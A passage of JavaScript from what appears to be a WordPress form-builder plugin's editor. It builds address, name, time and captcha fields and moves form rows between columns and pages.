					street.setAttribute("type", 'text');
					street.style.cssText = "width:100%";
					street.setAttribute("id", id+"_"+address_fields[l]+"form_id_temp");
					street.setAttribute("name", (parseInt(id)+l)+"_"+address_fields[l]+"form_id_temp");
					street.setAttribute("onChange", "change_value('"+id+"_"+address_fields[l]+"form_id_temp')");
						
				var street_label = document.createElement('label');
					street_label.setAttribute("class", "mini_label");	
					street_label.setAttribute("id", id+"_mini_label_"+address_fields[l]);
					street_label.style.cssText = "display:block;";
					street_label.innerHTML=document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
					w_mini_labels[l] = document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
					
				var span_addres = document.createElement('span');
					span_addres.style.cssText = "float:left; width:100%;  padding-bottom: 8px; display:block";	
				
				span_addres.appendChild(street);
				span_addres.appendChild(street_label);
				div.appendChild(span_addres);				
					
			}	
			else
			{
			left_right++;
			
				if(address_fields[l]!='country')
				{

				
					var field = document.createElement('input');
						field.setAttribute("type", 'text');
						field.style.cssText = "width:100%";
						field.setAttribute("id", id+"_"+address_fields[l]+"form_id_temp");
						field.setAttribute("name", (parseInt(id)+l)+"_"+address_fields[l]+"form_id_temp");
						field.setAttribute("onChange", "change_value('"+id+"_"+address_fields[l]+"form_id_temp')");

					var field_label = document.createElement('label');
						field_label.setAttribute("class", "mini_label");		
						field_label.setAttribute("id", id+"_mini_label_"+address_fields[l]);
						field_label.style.cssText = "display:block;";
						field_label.innerHTML=document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
						w_mini_labels[l] = document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
						
					
				}
				else
				{
						var field = document.createElement('select');
							field.setAttribute("type", 'text');
							field.style.cssText = "width:100%";
							field.setAttribute("id", id+"_countryform_id_temp");
							field.setAttribute("name", (parseInt(id)+l)+"_countryform_id_temp");
							field.setAttribute("onChange", "change_state_input('"+id+"', 'form_id_temp')");

						var field_label = document.createElement('label');
							field_label.setAttribute("class", "mini_label");	
							field_label.setAttribute("id", id+"_mini_label_country");
							field_label.style.cssText = "display:block;";
							field_label.innerHTML=document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
							w_mini_labels[l] = document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
							
						var option_ = document.createElement('option');
							option_.setAttribute("value", "");
							option_.innerHTML="";
						field.appendChild(option_);
						
						coutries=["Afghanistan","Albania",	"Algeria","Andorra","Angola","Antigua and Barbuda","Argentina","Armenia","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bhutan","Bolivia","Bosnia and Herzegovina","Botswana","Brazil","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Canada","Cape Verde","Central African Republic","Chad","Chile","China","Colombia","Comoros","Congo (Brazzaville)","Congo","Costa Rica","Cote d'Ivoire","Croatia","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","East Timor (Timor Timur)","Ecuador","Egypt","El Salvador","Equatorial Guinea","Eritrea","Estonia","Ethiopia","Fiji","Finland","France","Gabon","Gambia, The","Georgia","Germany","Ghana","Greece","Grenada","Guatemala","Guinea","Guinea-Bissau","Guyana","Haiti","Honduras","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Israel","Italy","Jamaica","Japan","Jordan","Kazakhstan","Kenya","Kiribati","Korea, North","Korea, South","Kuwait","Kyrgyzstan","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Marshall Islands","Mauritania","Mauritius","Mexico","Micronesia","Moldova","Monaco","Mongolia","Morocco","Mozambique","Myanmar","Namibia","Nauru","Nepal","Netherlands","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palau","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Qatar","Romania","Russia","Rwanda","Saint Kitts and Nevis","Saint Lucia","Saint Vincent","Samoa","San Marino","Sao Tome and Principe","Saudi Arabia","Senegal","Serbia and Montenegro","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","Solomon Islands","Somalia","South Africa","Spain","Sri Lanka","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Togo","Tonga","Trinidad and Tobago","Tunisia","Turkey","Turkmenistan","Tuvalu","Uganda","Ukraine","United Arab Emirates","United Kingdom","United States","Uruguay","Uzbekistan","Vanuatu","Vatican City","Venezuela","Vietnam","Yemen","Zambia","Zimbabwe"];	
						for(r=0;r<coutries.length;r++)
						{
						var option_ = document.createElement('option');
							option_.setAttribute("value", coutries[r]);
							option_.innerHTML=coutries[r];
						field.appendChild(option_);
						}
				
				}	

				if(left_right%2!=0)	
				{
					var span_addres = document.createElement('span');
						span_addres.style.cssText = "float:left; width:48%; padding-bottom: 8px;";
				}
				else
				{
					var span_addres = document.createElement('span');
						span_addres.style.cssText = "float:right; width:48%; padding-bottom: 8px;";
				}	
					
				span_addres.appendChild(field);
				span_addres.appendChild(field_label);
				div.appendChild(span_addres);
				
			}
		}
		else
		{
			var hidden_field = document.createElement('input');
				hidden_field.setAttribute("type", 'hidden');
				hidden_field.setAttribute("id", id+"_"+address_fields[l]+"form_id_temp");
				hidden_field.setAttribute("value", document.getElementById("el_"+address_fields[l]+"_label").innerHTML);
				hidden_field.setAttribute("id_for_label", parseInt(id)+l); 
				
				hidden_labels.push(hidden_field);
		
		}
		
		
		for(k=0; k<hidden_labels.length; k++)
		{
		div.appendChild(hidden_labels[k]);

		}
		
	}
	
	
	if(document.getElementById(id+"_disable_fieldsform_id_temp").getAttribute("state")=='no' && document.getElementById(id+"_disable_fieldsform_id_temp").getAttribute("country")=='yes')
		change_state_input(id,'form_id_temp');
		
	jQuery(document).ready(function() {		
		jQuery("label#"+id+"_mini_label_street1").click(function() {			
			if (jQuery(this).children('input').length == 0) {				
				var street1 = "<input type='text' class='street1' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
				jQuery(this).html(street1);					
				jQuery("input.street1").focus();		
				jQuery("input.street1").blur(function() {	
					var value = jQuery(this).val();			
					jQuery("#"+id+"_mini_label_street1").text(value);		
					document.getElementById('el_street1_label').innerHTML=	value;	
				});		
			}	
		});		
	
	jQuery("label#"+id+"_mini_label_street2").click(function() {		
	if (jQuery(this).children('input').length == 0) {		
	var street2 = "<input type='text' class='street2'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
		jQuery(this).html(street2);					
		jQuery("input.street2").focus();		
		jQuery("input.street2").blur(function() {	
	var value = jQuery(this).val();			
		jQuery("#"+id+"_mini_label_street2").text(value);
		document.getElementById('el_street2_label').innerHTML=	value;		
	});		
	}	
	});	
	
	
	jQuery("label#"+id+"_mini_label_city").click(function() {	
	if (jQuery(this).children('input').length == 0) {	
	var city = "<input type='text' class='city'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
		jQuery(this).html(city);			
		jQuery("input.city").focus();				
		jQuery("input.city").blur(function() {			
	var value = jQuery(this).val();		
		jQuery("#"+id+"_mini_label_city").text(value);	
		document.getElementById('el_city_label').innerHTML=	value;		
	});		
	}	
	});	
	
	jQuery("label#"+id+"_mini_label_state").click(function() {		
	if (jQuery(this).children('input').length == 0) {	
	var state = "<input type='text' class='state'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
		jQuery(this).html(state);		
		jQuery("input.state").focus();		
		jQuery("input.state").blur(function() {		
	var value = jQuery(this).val();			
		jQuery("#"+id+"_mini_label_state").text(value);
		document.getElementById('el_state_label').innerHTML=	value;		
	});	
	}
	});		

	jQuery("label#"+id+"_mini_label_postal").click(function() {		
	if (jQuery(this).children('input').length == 0) {			
	var postal = "<input type='text' class='postal'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
		jQuery(this).html(postal);			
		jQuery("input.postal").focus();			
		jQuery("input.postal").blur(function() {			
	var value = jQuery(this).val();		
		jQuery("#"+id+"_mini_label_postal").text(value);	
		document.getElementById('el_postal_label').innerHTML=	value;		
	});	
	}
	});	
	
	
	jQuery("label#"+id+"_mini_label_country").click(function() {		
		if (jQuery(this).children('input').length == 0) {		
		var country = "<input type='text' class='country'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
			jQuery(this).html(country);		
			jQuery("input.country").focus();	
			jQuery("input.country").blur(function() {		
		var value = jQuery(this).val();			
			jQuery("#"+id+"_mini_label_country").text(value);
			document.getElementById('el_country_label').innerHTML=	value;				
			});	
		}	
	});
	});	

	refresh_attr(id,type);
}

function enable_name_fields(id, field)
{
	var index = field == 'title' ? 2 : 3;
	tr_name1 = document.getElementById(id+'_tr_name1');
    tr_name2 = document.getElementById(id+'_tr_name2');
	first_input = document.getElementById(id+'_td_name_input_first');
    first_label = document.getElementById(id+'_td_name_label_first');

	var input_width = field == 'title' ? '40' : document.getElementById('edit_for_input_size').value;
	if(document.getElementById("el_"+field).checked==true)
		document.getElementById(id+"_enable_fieldsform_id_temp").setAttribute(field, "yes");
	else
		document.getElementById(id+"_enable_fieldsform_id_temp").setAttribute(field, "no");
		
	if(document.getElementById(id+'_enable_fieldsform_id_temp').getAttribute(field)=='yes') {
		var name_field_td = document.createElement('div');
			name_field_td.setAttribute("id", id+"_td_name_input_"+field);
			name_field_td.style.cssText = "display:table-cell";
			
		var name_field = document.createElement('input');
			name_field.setAttribute("type", 'text');
			if(w_title[index]==w_first_val[index]) {
				name_field.setAttribute("class", "input_deactive");
				name_field.setAttribute("value", w_first_val[index]);
			}	
			else {
				name_field.setAttribute("class", "input_active");
				name_field.setAttribute("value", w_first_val[index]);
			}	
			name_field.setAttribute("id", id+"_element_"+field+"form_id_temp");
			name_field.setAttribute("name", id+"_element_"+field+"form_id_temp");
			name_field.setAttribute("value", w_first_val[index]);
			name_field.setAttribute("title", w_title[index]);
			name_field.setAttribute("onfocus", "delete_value('"+id+"_element_"+field+"form_id_temp')");
			name_field.setAttribute("onblur", "return_value('"+id+"_element_"+field+"form_id_temp')");
			name_field.setAttribute("onChange", "change_value('"+id+"_element_"+field+"form_id_temp')");
			name_field.style.cssText = "margin-right: 10px; width: "+input_width+"px";
		
		var name_field_label_td = document.createElement('div');
			name_field_label_td.setAttribute("id", id+"_td_name_label_"+field);
			name_field_label_td.style.cssText = "display:table-cell";
		
		var name_field_label = document.createElement('label');
			name_field_label.setAttribute("class", "mini_label");	
			name_field_label.setAttribute("id", id+"_mini_label_"+field);
			name_field_label.innerHTML=document.getElementById('el_'+field+"_label").innerHTML;
		//	w_mini_labels[0] = document.getElementById('el_'+field+"_label").innerHTML;
			
		name_field_td.appendChild(name_field);
		name_field_label_td.appendChild(name_field_label);
		if(field == 'title') {
			tr_name1.insertBefore(name_field_td, first_input);
			tr_name2.insertBefore(name_field_label_td, first_label);
		}	
		else {
			tr_name1.appendChild(name_field_td);
			tr_name2.appendChild(name_field_label_td);
		}	
	}
	else{
		if(document.getElementById(id+'_td_name_input_'+field)) {
			tr_name1.removeChild(document.getElementById(id+'_td_name_input_'+field));
			tr_name2.removeChild(document.getElementById(id+'_td_name_label_'+field));
		}
	}
	
	var gic1 = document.createTextNode("-");
	var gic2 = document.createTextNode("-");

	value_if_empty_width = field == 'title' ? '60' : '95';
	var el_first_value= document.createElement('input');
		el_first_value.setAttribute("id", "el_first_value_"+field);
		el_first_value.setAttribute("type", "text");
		el_first_value.setAttribute("value", w_title[index]);	
		el_first_value.style.cssText = "width:"+value_if_empty_width+"px;";
		el_first_value.setAttribute("onKeyUp", "change_input_value(this.value,'"+id+"_element_"+field+"form_id_temp')");
			
    el_first_value_first = document.getElementById('el_first_value_first');
	parent = el_first_value_first.parentNode;
	if(document.getElementById(id+'_enable_fieldsform_id_temp').getAttribute(field)=='yes') {
		if(field == 'title') {
			parent.insertBefore(gic1, el_first_value_first);
			parent.insertBefore(el_first_value, gic1);
		}
		else {
			parent.appendChild(gic2);
			parent.appendChild(el_first_value);
		}
	} else {
		if(document.getElementById('el_first_value_'+field)) {
			if(field == 'title') 
				parent.removeChild( document.getElementById('el_first_value_title').nextSibling);
			else
				parent.removeChild( document.getElementById('el_first_value_middle').previousSibling);
			parent.removeChild( document.getElementById('el_first_value_'+field));
		}	
	}
	
	refresh_attr(id, 'type_name');
	refresh_id_name(id, 'type_name');
	
	jQuery(document).ready(function() {	
		jQuery("label#"+id+"_mini_label_title").click(function() {		
			if (jQuery(this).children('input').length == 0) {				
				var title = "<input type='text' class='title' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(title);							
				jQuery("input.title").focus();			
				jQuery("input.title").blur(function() {	
					var value = jQuery(this).val();			
					jQuery("#"+id+"_mini_label_title").text(value);	
					document.getElementById('el_title_label').innerHTML = value;						
				});	
			}	
		});		

		jQuery("label#"+id+"_mini_label_middle").click(function() {		
			if (jQuery(this).children('input').length == 0) {				
				var middle = "<input type='text' class='middle' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(middle);							
				jQuery("input.middle").focus();			
				jQuery("input.middle").blur(function() {	
					var value = jQuery(this).val();			
					jQuery("#"+id+"_mini_label_middle").text(value);	
					document.getElementById('el_middle_label').innerHTML = value;						
				});	
			}	
		});	
	});	
}


function set_unique(id)
{	
	if(document.getElementById(id).value=="yes")
	{
		document.getElementById(id).setAttribute("value", "no");
	}	
	else
	{
		document.getElementById(id).setAttribute("value", "yes")
	}
}

function set_randomize(id)
{	
	if(document.getElementById(id).value=="yes")
	{
		document.getElementById(id).setAttribute("value", "no");
	}	
	else
	{
		document.getElementById(id).setAttribute("value", "yes")
	}
}
function show_other_input(num)
{
		jQuery('.change_pos').each(function() {
		var k = jQuery(this)[0].id;
		if(document.getElementById(num+"_elementform_id_temp"+k)) 
			if(	document.getElementById(num+"_elementform_id_temp"+k).getAttribute('other')) 
				if(	document.getElementById(num+"_elementform_id_temp"+k).getAttribute('other')==1)
				{
					element_other=document.getElementById(num+"_elementform_id_temp"+k);
					return false;
				}
	});


	var parent=element_other.parentNode;

	var br = document.createElement('br');
		br.setAttribute("id", num+"_other_brform_id_temp");
		
	var el_other = document.createElement('input');
		el_other.setAttribute("id", num+"_other_inputform_id_temp");
		el_other.setAttribute("name", num+"_other_inputform_id_temp");
		el_other.setAttribute("type", "text");
		el_other.setAttribute("class", "other_input");
	parent.appendChild(br);
	parent.appendChild(el_other);
}

function set_allow_other(num, type)
{	
	if(document.getElementById(num+'_allow_otherform_id_temp').value=="yes")
	{
	
		document.getElementById(num+'_allow_otherform_id_temp').setAttribute("value", "no");
		jQuery('.change_pos').each(function() {
			var k = jQuery(this)[0].id;
			if(document.getElementById("el_choices"+k)) 
				if(	document.getElementById("el_choices"+k).getAttribute('other')) 
					if(	document.getElementById("el_choices"+k).getAttribute('other')==1)
					{
						remove_choise(k,num,type);
						return false;
					}
		});
					
	}	
	else
	{
		document.getElementById(num+'_allow_otherform_id_temp').setAttribute("value", "yes");
		var max_value = 0;
		jQuery('.change_pos').each(function() {
			var value = parseInt(jQuery(this)[0].id);
			max_value = (value > max_value) ? value : max_value;
		});

		max_value = max_value + 1;

				
				var choices_td= document.getElementById('choices');
				var div = document.createElement('div');
			           div.setAttribute("id", max_value);
			           div.setAttribute("class", "change_pos");
				var el_choices = document.createElement('input');
					el_choices.setAttribute("id", "el_choices"+max_value);
					el_choices.setAttribute("type", "text");
					el_choices.setAttribute("value", "other");
					el_choices.setAttribute("other", "1");
					el_choices.setAttribute("class", "fm-field-choice");
			        el_choices.setAttribute("onKeyUp", "change_label('"+num+"_label_element"+max_value+"', this.value); change_in_value('"+num+"_elementform_id_temp"+max_value+"', this.value)");
					
			    var el_choices_value = document.createElement('input');
			        el_choices_value.setAttribute("id", "el_option_value"+max_value);
			        el_choices_value.setAttribute("type", "text");
			        el_choices_value.setAttribute("value", '');
					el_choices_value.setAttribute("class", "fm-field-choice");
			        el_choices_value.setAttribute("disabled", 'disabled');
			
				var el_choices_remove = document.createElement('img');
					el_choices_remove.setAttribute("id", "el_choices"+max_value+"_remove");
					el_choices_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
					el_choices_remove.style.cssText =  'cursor:pointer;vertical-align:middle; margin:2px; display:none';
					el_choices_remove.setAttribute("align", 'top');
					el_choices_remove.setAttribute("onClick", "remove_choise('"+max_value+"','"+num+"','"+type+"')");
			
				var el_choices_handle = document.createElement('img');
			        el_choices_handle.setAttribute("class", "el_choices_sortable");
			        el_choices_handle.setAttribute("src", plugin_url + '/images/move_cursor.png?ver=1.8.0');		
			        el_choices_handle.style.cssText = 'cursor:move; vertical-align:middle; margin:2px 0px 2px 34px;';
			        el_choices_handle.setAttribute("align", 'top');
		
		        var el_choices_params = document.createElement('input');
			        el_choices_params.setAttribute("id", "el_option_params"+max_value);
			        el_choices_params.setAttribute("class", "el_option_params");
			        el_choices_params.setAttribute("type", "hidden");
			        el_choices_params.setAttribute("value", "");
			
		        div.appendChild(el_choices);
		        div.appendChild(el_choices_value);
		        div.appendChild(el_choices_remove);
		        div.appendChild(el_choices_handle);
		        div.appendChild(el_choices_params);
		        choices_td.appendChild(div);
				
			if(type=='checkbox')
			refresh_attr(num, 'type_checkbox');
				

			if(type=='radio')
			refresh_attr(num, 'type_radio');

			
			refresh_rowcol(num, type);
	}

}

function option_right(id, type)
{
	jQuery('#'+id+'_table_little').find(jQuery('.ch-rad-label')).css("cssText", "float: none !important;");
	jQuery('#'+id+'_table_little').find(jQuery('#main_div input[type="'+type+'"]')).css("cssText", "float: left !important;");
	jQuery('#'+id+'_option_left_right').val('right');
}


function option_left(id, type)
{
	jQuery('#'+id+'_table_little').find(jQuery('.ch-rad-label')).css("cssText", "float: left !important;");
	jQuery('#'+id+'_table_little').find(jQuery('#main_div input[type="'+type+'"]')).css("cssText", "float: right !important;");
	jQuery('#'+id+'_option_left_right').val('left');
}

function flow_hor(id)
{
	tbody=document.getElementById(id+'_table_little');
	td_array= new Array();
	n=tbody.childNodes.length;
	for(k=0; k<n;k++)
		td_array[k]=tbody.childNodes[k].childNodes[0];
		
	for(k=0; k<n;k++)
		tbody.removeChild(tbody.childNodes[0]);
		
	var tr = document.createElement('div');
		tr.style.display="table-row";
           	tr.setAttribute("id", id+"_hor");
			
	tbody.appendChild(tr);
	for(k=0; k<n;k++)
		tr.appendChild(td_array[k]);
}

function flow_ver(id)
{	
	tbody=document.getElementById(id+'_table_little');
	tr=document.getElementById(id+'_hor');
	td_array= new Array();
	n=tr.childNodes.length;
	
	for(k=0; k<n;k++)
		td_array[k]=tr.childNodes[k];
			
	tbody.removeChild(tr);
	
	for(k=0; k<n;k++)
	{      	
		var tr_little = document.createElement('div');
			tr_little.setAttribute("id", id+"_element_tr"+td_array[k].getAttribute("idi"));
			tr_little.style.display="table-row";
		tr_little.appendChild(td_array[k]);
		tbody.appendChild(tr_little);
	}			
}

function check_isnum_3_10(e)
{
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 51 || chCode1 > 57))
        return false
	else if((document.getElementById('captcha_digit').value+(chCode1-48))>9)
        return false;
	return true;
}

function check_isnum_less_then_5(e)
{
	var chCode1 = e.which || e.keyCode;
	if (chCode1 > 31 && (chCode1 < 49 || chCode1 > 57))
		return false;
	else if((document.getElementById('el_oper_count').value+(chCode1-48))>5)
        return false;
	return true;
}

function check_is_operation_valid(e)
{
	var chCode1 = e.which || e.keyCode;
	if (chCode1 == 46 || chCode1 < 42 || chCode1 > 47)
		return false;
	
	return true;
}

function set_sel_am_pm(select_)
{
	if(select_.options[0].selected) 
	{
		select_.options[0].setAttribute("selected", "selected");
		select_.options[1].removeAttribute("selected");
	}
	else
	{
		select_.options[1].setAttribute("selected", "selected");
		select_.options[0].removeAttribute("selected");
	}

}

function change_captcha_digit(digit) {
	captcha=document.getElementById('_wd_captchaform_id_temp');
	if (document.getElementById('captcha_digit').value) {	
		captcha.setAttribute("digit", digit);
		captcha.setAttribute("src", url_for_ajax + "?action=formcontactwdcaptcha&digit="+digit+"&i=form_id_temp");
		document.getElementById('_wd_captcha_inputform_id_temp').style.width=(document.getElementById('captcha_digit').value*10+15)+"px";
	}
	else {
		captcha.setAttribute("digit", "6");
		captcha.setAttribute("src", url_for_ajax+"?action=formcontactwdcaptcha&digit=6&i=form_id_temp");
		document.getElementById('_wd_captcha_inputform_id_temp').style.width=(6*10+15)+"px";
	}
}

function change_arithmetic_captcha(value, field) {
	arithmetic_captcha = document.getElementById('_wd_arithmetic_captchaform_id_temp');
	if (field == 'oper_count') {
		oper_count = value ? value : 1;
		operations = document.getElementById('el_operations') ? document.getElementById('el_operations').value : '+, -, *, /';
	} else {
		operations = value ? value : '+, -, *, /';
		oper_count = document.getElementById('el_oper_count') ? document.getElementById('el_oper_count').value : 1;
	}	

	arithmetic_captcha.setAttribute("operations_count", oper_count);
	arithmetic_captcha.setAttribute("operations", operations);
	arithmetic_captcha.setAttribute("src", url_for_ajax + "?action=formcontactwdmathcaptcha&operations_count="+oper_count+"&operations="+operations.replace('+','@')+"&i=form_id_temp");
}



function second_no(id)
{	
	time_box=document.getElementById(id+'_tr_time1');
	text_box=document.getElementById(id+'_tr_time2');
	second_box=document.getElementById(id+'_td_time_input3');
	second_text=document.getElementById(id+'_td_time_label3');
	document.getElementById(id+'_td_time_input2').parentNode.removeChild(document.getElementById(id+'_td_time_input2').nextSibling);
	time_box.removeChild(second_box);
	text_box.removeChild(second_text.previousSibling);
	text_box.removeChild(second_text);
	
}

function second_yes(id, w_ss)
{	
	time_box=document.getElementById(id+'_tr_time1');
	text_box=document.getElementById(id+'_tr_time2');
	
	var td_time_input2_ket = document.createElement('div');
           	td_time_input2_ket.setAttribute("align", "center");
			td_time_input2_ket.style.display="table-cell";
	var td_time_input3 = document.createElement('div');
           	td_time_input3.setAttribute("id", id+"_td_time_input3");
			td_time_input3.style.display="table-cell";
			
      	var td_time_label2_ket = document.createElement('div');
			td_time_label2_ket.style.display="table-cell";
	
      	var td_time_label3 = document.createElement('div');
           	td_time_label3.setAttribute("id", id+"_td_time_label3");
			td_time_label3.style.display="table-cell";

	var mm_ = document.createElement('span');
		mm_.setAttribute("class", 'wdform_colon');
		mm_.style.cssText = "font-style:bold; vertical-align:middle";
		mm_.innerHTML="&nbsp;:&nbsp;";
	td_time_input2_ket.appendChild(mm_);
		
	var ss = document.createElement('input');

           	ss.setAttribute("type", 'text');
           	ss.setAttribute("value", w_ss);
		
           	ss.setAttribute("class", "time_box");
		ss.setAttribute("id", id+"_ssform_id_temp");
		ss.setAttribute("name", id+"_ssform_id_temp");
		ss.setAttribute("onKeyPress", "return check_second(event, '"+id+"_ssform_id_temp')");
		ss.setAttribute("onKeyUp", "change_second(event,'"+id+"_ssform_id_temp')");
		ss.setAttribute("onBlur", "add_0('"+id+"_ssform_id_temp')");
	var ss_label = document.createElement('label');
           	ss_label.setAttribute("class", "mini_label");
		ss_label.innerHTML="SS";
		ss_label.setAttribute("id", id+"_mini_label_ss");

	td_time_input3.appendChild(ss);
	td_time_label3.appendChild(ss_label);
	
	if(document.getElementById(id+'_am_pm_select'))
	{
		select_=document.getElementById(id+"_am_pm_select");
		select_text=document.getElementById(id+"_am_pm_label");
		
		time_box.insertBefore(td_time_input3, select_);
		time_box.insertBefore(td_time_input2_ket, td_time_input3);
		
		text_box.insertBefore(td_time_label3, select_text);
		text_box.insertBefore(td_time_label2_ket, td_time_label3);
	}
	else
	{
	time_box.appendChild(td_time_input2_ket);
	time_box.appendChild(td_time_input3);
	text_box.appendChild(td_time_label2_ket);
	text_box.appendChild(td_time_label3);
	}
	
jQuery(document).ready(function() {	
	
		jQuery("label#"+id+"_mini_label_ss").click(function() {	
	if (jQuery(this).children('input').length == 0) {		
		var ss = "<input type='text' class='ss' style='outline:none; border:none; background:none; width:40px;' value=\""+jQuery(this).text()+"\">";	
			jQuery(this).html(ss);			
			jQuery("input.ss").focus();					
			jQuery("input.ss").blur(function() {			
			var value = jQuery(this).val();			
			
			jQuery("#"+id+"_mini_label_ss").text(value);	
		});	
	}	
	});
	});
	
	
refresh_attr(id, 'type_time');
}

function check_isnum_interval(e, id, from, to)
{
	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	val=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	if(val.length>2)
        	return false;
			
	if(val=='00')
        	return false;
			
	if((val<from) || (val>to))
        	return false;
	return true;

}


function check_isnum_point(e)
{
   	var chCode1 = e.which || e.keyCode;
	
	if (chCode1 ==46)
		return true;
	
	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	return true;
}


function check_isnum(e)
{
	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	return true;
}

function check_isnum_or_minus(e)
{
	
   	var chCode1 = e.which || e.keyCode;
	if (chCode1 != 45 )
	{
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	}	
	return true;
}

function check_isspacebar(e)
{
	
   	var chCode1 = e.which || e.keyCode;
	if (chCode1 == 32 )
        return false;	

	return true;
}

function change_w_style(id, w)
{
	if(document.getElementById(id))
	document.getElementById(id).style.width=w+"px";
}

function change_w_label(id, w)
{
	if(document.getElementById(id))
	document.getElementById(id).innerHTML=w;
}

function change_h_style(id, h)
{
	document.getElementById(id).style.height=h+"px";
}

function change_w(id, w)
{
	document.getElementById(id).setAttribute("width", w)
}

function change_h(id, h)
{
	document.getElementById(id).setAttribute("height", h);
}

function change_key(value, attribute)
{
	document.getElementById('wd_recaptchaform_id_temp').setAttribute(attribute, value);
}

function captcha_refresh(id)
{	
	srcArr=document.getElementById(id+"form_id_temp").src.split("&r=");
	document.getElementById(id+"form_id_temp").src=srcArr[0]+'&r='+Math.floor(Math.random()*100);
	document.getElementById(id+"_inputform_id_temp").value='';
}

function up_row(id)
{
  event.stopPropagation();
	wdform_field=document.getElementById("wdform_field"+id);
	wdform_row=wdform_field.parentNode;
	wdform_column=wdform_row.parentNode;
	wdform_section=wdform_column.parentNode;
	wdform_page=wdform_section.parentNode;

	k=0;
	
	while(wdform_column.childNodes[k])
	{
		if(wdform_column.childNodes[k].getAttribute("wdid"))
			if(id==wdform_column.childNodes[k].getAttribute("wdid"))
				break;
		k++;
	}

	if(k!=0)
	{
		up=wdform_column.childNodes[k-1];
		down=wdform_column.childNodes[k];
		wdform_column.removeChild(down);
		wdform_column.insertBefore(down, up);
		return;
	}
	
	///////////en depqum yerb section breaka
	
	if(wdform_section.previousSibling)
	{
		if(wdform_section.previousSibling.getAttribute('type'))
		{
			wdform_section.previousSibling.previousSibling.firstChild.appendChild(wdform_row);
			return;
		}
	}

	///////////pagei mej

	page_up(id);
}

function down_row(id)
{
  event.stopPropagation();
	wdform_field=document.getElementById("wdform_field"+id);
	wdform_row=wdform_field.parentNode;
	wdform_column=wdform_row.parentNode;
	wdform_section=wdform_column.parentNode;
	wdform_page=wdform_section.parentNode;

	l=wdform_column.childNodes.length;
	
	/*
	form=wdform_column
	*/
	k=0;
	
	while(wdform_column.childNodes[k])
	{
		if(wdform_column.childNodes[k].getAttribute("wdid"))
			if(id==wdform_column.childNodes[k].getAttribute("wdid"))
				break;
		k++;
	}

	if(k!=l-1)
	{
	///////////ira mej
		up=wdform_column.childNodes[k];
		down=wdform_column.childNodes[k+2];
		wdform_column.removeChild(up);
		
		if(!down)
			down=null;

		wdform_column.insertBefore(up, down);
		return;
	}
	///////////en depqum yerb section breaka
	
	if(wdform_section.nextSibling.getAttribute('type'))
	{
		wdform_section.nextSibling.nextSibling.firstChild.appendChild(wdform_row);
		return;
	}

	///////////pagei mej
	page_down(id);
}

function right_row(id)
{
  event.stopPropagation();
	wdform_field=document.getElementById("wdform_field"+id);
	wdform_row=wdform_field.parentNode;
	wdform_column=wdform_row.parentNode;
	wdform_section=wdform_column.parentNode;
	if(wdform_column.nextSibling!=null)
	{
		wdform_column_next=wdform_column.nextSibling;
		wdform_column_next.appendChild(wdform_row);
	
	}
	else
	{
	    var wdform_column_new = document.createElement('div');
			wdform_column_new.setAttribute("class", "wdform_column");

	    wdform_section.appendChild(wdform_column_new);
	
	    wdform_column_new.appendChild(wdform_row);
	
	    
	}
//	if(wdform_column.firstChild==null)
//		wdform_section.removeChild(wdform_column);	
	
	
	sortable_columns();
	remove_empty_columns();

	if(document.getElementById("enable_sortable").value==0)
		jQuery('.wdform_column').sortable( "disable" );	
	
}

function left_row(id)
{
  event.stopPropagation();
	wdform_field=document.getElementById("wdform_field"+id);
	wdform_row=wdform_field.parentNode;
	wdform_column=wdform_row.parentNode;
	wdform_section=wdform_column.parentNode;
	if(wdform_column.previousSibling!=null)
	{
		wdform_column_next=wdform_column.previousSibling;
		wdform_column_next.appendChild(wdform_row);
	
	}

//	if(wdform_column.firstChild==null)
//		wdform_section.removeChild(wdform_column);
	
	sortable_columns();
	remove_empty_columns();
		
	if(document.getElementById("enable_sortable").value==0)
		jQuery('.wdform_column').sortable( "disable" );
}

function page_up(id)
{
  event.stopPropagation();
	wdform_field=document.getElementById("wdform_field"+id);
	wdform_row=wdform_field.parentNode;
	wdform_column=wdform_row.parentNode;
	wdform_section=wdform_column.parentNode;
	wdform_page=wdform_section.parentNode;
	wdform_page_and_images=wdform_page.parentNode;
			
			while(wdform_page_and_images)
			{
				wdform_page_and_images=wdform_page_and_images.previousSibling;	
				
				if(!wdform_page_and_images)
				{
					alert('Unable to move');
					return;
				}
					
